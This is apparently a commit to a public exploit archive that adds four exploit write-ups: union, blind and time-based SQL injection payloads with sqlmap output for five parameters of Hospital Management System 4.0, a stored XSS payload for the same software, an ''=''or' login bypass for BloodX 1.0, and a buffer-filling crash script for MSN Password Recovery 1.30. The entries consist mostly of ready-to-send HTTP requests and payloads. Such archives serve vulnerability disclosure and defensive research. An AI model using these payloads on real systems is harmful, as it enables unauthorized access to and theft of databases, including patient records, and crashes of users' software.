DB: 2020-01-03

4 changes to exploits/shellcodes MSN Password Recovery 1.30 - Denial of Service (PoC) Hospital Management System 4.0 - 'searchdata' SQL Injection Hospital Management System 4.0 - Persistent Cross-Site Scripting BloodX 1.0 - Authentication Bypass
2020-01-03 05:02:00 +00:00 · 2020-01-03 05:02:00 +00:00 · 3b67743b55
commit 3b67743b55
parent fcc50f8a35
5 changed files with 258 additions and 0 deletions
--- a/exploits/php/webapps/47840.txt
+++ b/exploits/php/webapps/47840.txt
@ -0,0 +1,166 @@
+# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection
+# Google Dork: N/A
+# Date: 2020-01-02
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
+# Version: v4.0
+# Tested on: Windows
+# CVE : N/A
+
+# The Hospital Management System 4.0 web application is vulnerable to
+# SQL injection in multiple areas, listed below are 5 of the prominent
+# and easy to exploit areas.
+
+================================ 1 - SQLi ================================
+
+POST /hospital/hospital/hms/doctor/search.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 22
+Origin: https://10.0.0.214
+DNT: 1
+Connection: close
+Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php
+Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
+Upgrade-Insecure-Requests: 1
+
+searchdata=&search=
+
+?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.
+
+POST parameter 'searchdata' is vulnerable.
+sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:
+---
+Parameter: searchdata (POST)
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 11 columns
+    Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=
+---
+[15:49:58] [INFO] testing MySQL
+[15:49:58] [INFO] confirming MySQL
+[15:49:58] [INFO] the back-end DBMS is MySQL
+web application technology: Apache 2.4.41, PHP 7.4.1
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+[15:49:58] [INFO] fetching database names
+available databases [6]:
+[*] hms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+
+================================ 2 - SQLi ================================
+
+GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
+sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
+---
+Parameter: viewid (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim
+
+    Type: UNION query
+    Title: Generic UNION query (NULL) - 11 columns
+    Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp
+
+[15:54:21] [INFO] fetching database names
+available databases [6]:
+[*] hms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+
+GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login
+
+================================ 3 - SQLi ================================
+
+Parameter: bs (POST)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=
+
+?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient
+
+================================ 4 - SQLi ================================
+
+POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 111
+Origin: https://10.0.0.214
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5
+Upgrade-Insecure-Requests: 1
+
+patname=
+
+patname parameter is vulnerable to SQLi under the add patient in the doctor login
+
+================================ 5 - SQLi ================================
+
+---
+Parameter: cpass (POST)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
+    Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind
+    Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123
+---
+available databases [6]:
+[*] hms
+[*] information_schema
+[*] mysql
+[*] performance_schema
+[*] phpmyadmin
+[*] test
+
+POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 38
+Origin: http://10.0.0.214
+DNT: 1
+Connection: close
+Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php
+Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
+Upgrade-Insecure-Requests: 1
+
+cpass=123&npass=123&cfpass=123&submit=123
+
+the ?cpass parameter is vulnerable to blind SQL injection
--- a/exploits/php/webapps/47841.txt
+++ b/exploits/php/webapps/47841.txt
@ -0,0 +1,36 @@
+# Exploit Title: Hospital Management System 4.0 - Persistent Cross-Site Scripting
+# Google Dork: N/A
+# Date: 2020-01-02
+# Exploit Author: FULLSHADE
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/hospital-management-system-in-php/
+# Version: v4.0
+# Tested on: Windows
+# CVE : N/A
+
+================ 1. - Cross Site Scripting (Persistent) ================
+
+URL  :  http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
+Method   :  POST
+Parameter:  doctorspecilization
+Attack   : </td><script>alert("XSS");</script><td>
+
+POST /hospital/hospital/hms/admin/doctor-specilization.php HTTP/1.1
+Host: 10.0.0.214
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://10.0.0.214/hospital/hospital/hms/admin/doctor-specilization.php
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 97
+Origin: http://10.0.0.214
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5
+Upgrade-Insecure-Requests: 1
+Cache-Control: max-age=0
+
+doctorspecilization=%3C%2Ftd%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript%3E%3Ctd%3E&submit=
+
+?doctorspecilization parameter is vulnerable to create a persistent and stored XSS exploit in the application depending on how it's viewed
--- a/exploits/php/webapps/47842.txt
+++ b/exploits/php/webapps/47842.txt
@ -0,0 +1,30 @@
+# Exploit Title: BloodX 1.0 - Authentication Bypass
+# Author: riamloo
+# Date: 2019-12-31
+# Vendor Homepage: https://github.com/diveshlunker/BloodX
+# Software Link: https://github.com/diveshlunker/BloodX/archive/master.zip
+# Version: 1
+# CVE: N/A
+# Tested on: Win 10
+
+# Discription:
+# An standalone platform which lets donors, receivers, organizers and sponsers to merge.
+# Vulnerability: Attacker can bypass login page and access to dashboard page
+# vulnerable file : login.php
+# Parameter & Payload: '=''or'
+# Proof of Concept:
+http://localhost//BloodX-master/login.php
+
+POST /BloodX-master/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 63
+Referer: http://localhost/BloodX-master/login.php
+Cookie: PHPSESSID=qusaqht0gvh0f97vbf44ep3iu
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=LOGIN
--- a/exploits/windows/dos/47839.py
+++ b/exploits/windows/dos/47839.py
@ -0,0 +1,22 @@
+# Exploit Title: MSN Password Recovery 1.30 - Denial of Service (PoC)
+# Date: 2020-01-02
+# Vendor Homepage: https://www.top-password.com/
+# Software Link: https://www.top-password.com/download/MSNPRSetup.exe
+# Exploit Author: Gokkulraj
+# Tested Version: v1.30
+# Tested on: Windows 7 x64
+
+# 1.- Download and install MSN Password Recovery
+# 2.- Run python code : MSN Password Recovery.py
+# 3.- Open CRASH.txt and copy content to clipboard
+# 4.- Open MSN Password Recovery and Click 'EnterKey'
+# 5.- Paste the content of CRASH.txt into the Field: 'User Name and
+Registration Code'
+# 6.- click 'OK' you will see a crash.
+
+#!/usr/bin/env python
+Dos= "\x41" * 9000
+myfile=open('CRASH.txt','w')
+myfile.writelines(Dos)
+myfile.close()
+print("File created")
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -6626,6 +6626,7 @@ id,file,description,date,author,type,platform,port
 47791,exploits/macos/dos/47791.txt,"macOS 10.14.6 (18G87) - Kernel Use-After-Free due to Race Condition in wait_for_namespace_event()",2019-12-18,"Google Security Research",dos,macos,
 47794,exploits/windows/dos/47794.py,"FTP Navigator 8.03 -  'Custom Command' Denial of Service (SEH)",2019-12-19,"Chris Inzinga",dos,windows,
 47797,exploits/windows/dos/47797.c,"Microsoft Windows 10 BasicRender.sys - Denial of Service (PoC)",2019-12-20,vportal,dos,windows,
+47839,exploits/windows/dos/47839.py,"MSN Password Recovery 1.30 - Denial of Service (PoC)",2020-01-02,Gokkulraj,dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -42143,3 +42144,6 @@ id,file,description,date,author,type,platform,port
 47834,exploits/php/webapps/47834.py,"Shopping Portal ProVersion 3.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,
 47835,exploits/hardware/webapps/47835.txt,"IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal",2020-01-01,"Raif Berkay Dincel",webapps,hardware,
 47836,exploits/php/webapps/47836.py,"Hospital Management System 4.0 - Authentication Bypass",2020-01-01,"Metin Yunus Kandemir",webapps,php,
+47840,exploits/php/webapps/47840.txt,"Hospital Management System 4.0 - 'searchdata' SQL Injection",2020-01-02,FULLSHADE,webapps,php,
+47841,exploits/php/webapps/47841.txt,"Hospital Management System 4.0 - Persistent Cross-Site Scripting",2020-01-02,FULLSHADE,webapps,php,
+47842,exploits/php/webapps/47842.txt,"BloodX 1.0 - Authentication Bypass",2020-01-02,riamloo,webapps,php,